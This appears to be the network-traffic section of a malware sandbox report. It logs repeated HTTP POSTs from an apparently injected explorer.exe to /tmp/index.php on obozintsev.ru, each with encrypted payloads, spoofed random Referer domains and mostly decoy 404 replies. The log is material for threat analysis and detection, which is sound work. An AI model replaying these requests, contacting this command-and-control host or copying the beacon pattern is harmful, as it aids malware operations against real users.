                                                                                                                        Nov 30, 2024 11:13:05.767579079 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://dqdghghmtaygindm.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 264
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:05.767607927 CET264OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 60 30 ac bc
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu`0U!O^#AQqctDa;KMFN-'&J--VWZM"a8ITSBdlyA^N;0bSWHa=\7&#{
                                                                                                                        Nov 30, 2024 11:13:07.570679903 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:07 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        22192.168.2.449780189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:07.693670988 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ievirvwtsxbiyvql.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 338
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:07.693706036 CET338OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7f 02 ad 92
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vupCZ*;d#Deg|;:(MT] on$8B rMN$?:0/Py0gMOG2v
                                                                                                                        Nov 30, 2024 11:13:09.507329941 CET194INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:09 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16
                                                                                                                        Data Ascii: #\6cB1I!#1Uc;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        23192.168.2.449797189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:13.461258888 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://cdwxnwopeyrbni.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 327
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:13.461287975 CET327OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 1f 6b 2c 90 f5 76 0b 75 46 1d a5 e2
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA ,[k,vuFdD{e_cL-V{B9:@?#5'@2,H@d[nykG^6^Q!l]Bk\k(biL$3ZA`gP&y
                                                                                                                        Nov 30, 2024 11:13:15.257535934 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:14 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        24192.168.2.449803189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:15.396183014 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://fgbhvviibbt.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 118
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:15.396204948 CET118OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 46 0c d9 ad
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuF?R07{1f.?][
                                                                                                                        Nov 30, 2024 11:13:17.454736948 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:17 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        25192.168.2.449809189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:17.578808069 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://miptxmfamtohobtx.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 363
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:17.578838110 CET363OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 33 0c c8 a0
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu3XJ]YRm&N3foOMw5H.0n!.;(uMDi5.a+WC&U"cFYM_%F?Oeu!=l
                                                                                                                        Nov 30, 2024 11:13:19.368659019 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:19 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        26192.168.2.449815189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:19.497152090 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://jwqwkqwentbhrv.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 204
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:19.497152090 CET204OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 4f 0a bd 9b
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuOwNU=r\HO}rpyB,^=:WjbGY+%s8E#{uC
                                                                                                                        Nov 30, 2024 11:13:21.288722992 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:20 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        27192.168.2.449819189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:21.415868998 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://rtjqjvueogqtxkos.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 295
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:21.415903091 CET295OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 79 25 a8 b5
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuy%HUPTv;Ie:e, G*t@(3:</8`b3GK*pEh^DMHx^XYDvS4D{[)r}rRT0Q)
                                                                                                                        Nov 30, 2024 11:13:23.208852053 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:22 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        28192.168.2.449823189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:23.331949949 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ghrwspfuixcrwvx.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 327
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:23.331978083 CET327OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 47 54 eb 93
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuGTBsnPWOB;?>{xC?@e25P\)+D}M2*bGhF0Dqxt3]O8fpbK_ZOkI;
                                                                                                                        Nov 30, 2024 11:13:25.128737926 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:24 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        29192.168.2.449828189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:25.453610897 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://qyqahwjnqtjwf.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 153
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:25.453622103 CET153OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 49 30 a8 fd
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuI0N>f^Mg+x".<:wy#7;^25LMgK2
                                                                                                                        Nov 30, 2024 11:13:27.262444973 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:26 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        30192.168.2.449834189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:27.394815922 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://jjaaaitryycjvb.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 284
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:27.394829035 CET284OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 7b 06 df 9e
